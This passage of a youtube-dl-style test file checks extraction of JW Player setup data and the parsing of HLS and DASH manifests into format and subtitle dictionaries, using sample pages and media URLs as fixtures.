'image': "https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg",
'filefallback': "https://cdn.pornoxo.com/key=9ZPsTR5EvPLQrBaak2MUGA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/m_4b2157147afe5efa93ce1978e0265289c193874e02597.mp4",
'logo.hide': true,
'skin': "https://t04.vipstreamservice.com/jwplayer/skin/modieus-blk.zip",
'plugins': "https://t04.vipstreamservice.com/jwplayer/dock/dockableskinnableplugin.swf",
'dockableskinnableplugin.piclink': "/index.php?key=ajax-videothumbsn&vid=7564&data=2009-12--14--4b2157147afe5efa93ce1978e0265289c193874e02597.flv--17370",
'controlbar': 'bottom',
'modes': [
{type: 'flash', src: 'https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf'}
],
'provider': 'http'
});
//noinspection JSAnnotator
invideo.setup({
adsUrl: "/banner-iframe/?zoneId=32",
adsUrl2: "",
autostart: false
});
</script>
''', 'dummy', require_title=False),
{
'thumbnail': 'https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg',
'formats': [{
'url': 'https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv',
'ext': 'flv'
}]
})
# from http://www.indiedb.com/games/king-machine/videos
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script>
jwplayer("mediaplayer").setup({"abouttext":"Visit Indie DB","aboutlink":"http:\/\/www.indiedb.com\/","displaytitle":false,"autostart":false,"repeat":false,"title":"king machine trailer 1","sharing":{"link":"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1","code":"<iframe width=\"560\" height=\"315\" src=\"http:\/\/www.indiedb.com\/media\/iframe\/1522983\" frameborder=\"0\" allowfullscreen><\/iframe><br><a href=\"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1\">king machine trailer 1 - Indie DB<\/a>"},"related":{"file":"http:\/\/rss.indiedb.com\/media\/recommended\/1522983\/feed\/rss.xml","dimensions":"160x120","onclick":"link"},"sources":[{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode_mp4\/king-machine-trailer.mp4","label":"360p SD","default":"true"},{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode720p_mp4\/king-machine-trailer.mp4","label":"720p HD"}],"image":"http:\/\/media.indiedb.com\/cache\/images\/games\/1\/50\/49678\/thumb_620x2000\/king-machine-trailer.mp4.jpg","advertising":{"client":"vast","tag":"http:\/\/ads.intergi.com\/adrawdata\/3.0\/5205\/4251742\/0\/1013\/ADTECH;cors=yes;width=560;height=315;referring_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;content_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;media_id=1522983;title=king+machine+trailer+1;device=__DEVICE__;model=__MODEL__;os=Windows+OS;osversion=__OSVERSION__;ua=__UA__;ip=109.171.17.81;uniqueid=1522983;tags=__TAGS__;number=58cac25928151;time=1489683033"},"width":620,"height":349}).once("play", function(event) {
videoAnalytics("play");
}).once("complete", function(event) {
videoAnalytics("completed");
});
</script>
''', 'dummy'),
{
'title': 'king machine trailer 1',
'thumbnail': 'http://media.indiedb.com/cache/images/games/1/50/49678/thumb_620x2000/king-machine-trailer.mp4.jpg',
'formats': [{
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode_mp4/king-machine-trailer.mp4',
'height': 360,
'ext': 'mp4'
}, {
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode720p_mp4/king-machine-trailer.mp4',
'height': 720,
'ext': 'mp4'
}]
})
def test_parse_m3u8_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/11995
# http://teamcoco.com/video/clueless-gamer-super-bowl-for-honor
'img_bipbop_adv_example_fmp4',
'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
[{
'format_id': 'aud1-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a1/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': 'aud2-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': 'aud3-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': '530',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '561',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '753',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '895',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '926',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1118',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1265',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1295',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1487',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '2168',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '2198',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '2390',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '3168',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '3199',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '3391',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '4670',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '4701',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '4893',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6170',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6200',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6392',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '7968',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '7998',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '8190',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}],
{}
),
(
'bipbop_16x9',
'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
[{
'format_id': 'bipbop_audio-BipBop Audio 2',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/alternate_audio_aac/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'language': 'eng',
'ext': 'mp4',
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'vcodec': 'none',
'audio_ext': 'mp4',
'video_ext': 'none',
}, {
'format_id': '41',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear0/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 41.457,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'vcodec': 'none',
'acodec': 'mp4a.40.2',
'audio_ext': 'mp4',
'video_ext': 'none',
'abr': 41.457,
}, {
'format_id': '263',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear1/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 263.851,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 416,
'height': 234,
'vcodec': 'avc1.4d400d',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 263.851,
'abr': 0,
}, {
'format_id': '577',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 577.61,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 640,
'height': 360,
'vcodec': 'avc1.4d401e',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 577.61,
'abr': 0,
}, {
'format_id': '915',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 915.905,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 960,
'height': 540,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 915.905,
'abr': 0,
}, {
'format_id': '1030',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 1030.138,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 1280,
'height': 720,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1030.138,
'abr': 0,
}, {
'format_id': '1924',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 1924.009,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 1920,
'height': 1080,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1924.009,
'abr': 0,
}],
{
'en': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/eng/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/eng_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'fr': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/fra/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/fra_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'es': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/spa/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/spa_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'ja': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/jpn/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/jpn_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
}
),
]
for m3u8_file, m3u8_url, expected_formats, expected_subs in _TEST_CASES:
with io.open('./test/testdata/m3u8/%s.m3u8' % m3u8_file,
mode='r', encoding='utf-8') as f:
formats, subs = self.ie._parse_m3u8_formats_and_subtitles(
f.read(), m3u8_url, ext='mp4')
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subs, expected_subs, None)
def test_parse_mpd_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/13919
# Also tests duplicate representation ids, see
# https://github.com/ytdl-org/youtube-dl/issues/15111
'float_duration',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'm4a',
'format_id': '318597',
'format_note': 'DASH audio',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 61.587,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '318597',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 318.597,
'width': 340,
'height': 192,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '638590',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 638.59,
'width': 512,
'height': 288,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '1022565',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 1022.565,
'width': 688,
'height': 384,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '2046506',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2046.506,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '3998017',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640029',
'tbr': 3998.017,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '5997485',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640032',
'tbr': 5997.485,
'width': 1920,
'height': 1080,
}],
{},
), (
# https://github.com/ytdl-org/youtube-dl/pull/14844
'urls_only',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_144p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 200,
'width': 256,
'height': 144,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_240p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 400,
'width': 424,
'height': 240,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_360p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 800,
'width': 640,
'height': 360,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_480p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1200,
'width': 856,
'height': 480,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_576p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1600,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_720p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 2400,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_1080p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 4400,
'width': 1920,
'height': 1080,
}],
{},
), (
# https://github.com/ytdl-org/youtube-dl/issues/20346
# Media considered unfragmented even though it contains
# Initialization tag
'unfragmented',
'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd', # mpd_url
'https://v.redd.it/hw1x7rcg7zl21', # mpd_base_url
[{
'url': 'https://v.redd.it/hw1x7rcg7zl21/audio',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'm4a',
'format_id': 'AUDIO-1',
'format_note': 'DASH audio',
'container': 'm4a_dash',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 129.87,
'asr': 48000,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_240',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-2',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 608.0,
'width': 240,
'height': 240,
'fps': 30,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_360',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-1',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 804.261,
'width': 360,
'height': 360,
'fps': 30,
}],
{},
), (
'subtitles',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/',
[{
'format_id': 'audio=128001',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'm4a',
'tbr': 128.001,
'asr': 48000,
'format_note': 'DASH audio',
'container': 'm4a_dash',
'vcodec': 'none',
'acodec': 'mp4a.40.2',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'audio_ext': 'm4a',
'video_ext': 'none',
'abr': 128.001,
}, {
'format_id': 'video=100000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 336,
'height': 144,
'tbr': 100,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 100,
}, {
'format_id': 'video=326000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 562,
'height': 240,
'tbr': 326,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 326,
}, {
'format_id': 'video=698000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 844,
'height': 360,
'tbr': 698,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
